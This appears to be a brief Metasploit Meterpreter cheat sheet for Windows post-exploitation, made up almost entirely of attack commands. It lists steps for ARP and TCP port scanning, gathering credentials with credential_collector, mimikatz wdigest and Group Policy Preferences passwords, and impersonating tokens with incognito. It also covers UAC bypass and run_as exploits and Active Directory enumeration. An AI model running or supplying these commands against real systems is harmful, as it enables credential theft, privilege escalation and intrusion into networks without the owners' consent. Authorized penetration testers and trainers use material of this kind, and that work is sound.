run arp_scanner -r <iP>/24
run auxiliary/scanner/portscan/tcp
run post/windows/gather/enum_applications
run post/windows/gather/credentials/credential_collector
​
load mimikatz
wdigest
​
load incognito
list_tokens -u
# Collect a load of info
run winenum
​
# Show privs
run post/windows/gather/win_privs
​
# Run as
use exploit/windows/local/run_as
​
# Bypass UAC
use exploit/windows/local/bypassuac_injection
# Enumeration ADSI
load extapi
help extapi
​
adsi_computer_enum domainname
​
# GPP
use post/windows/gather/credentials/gpp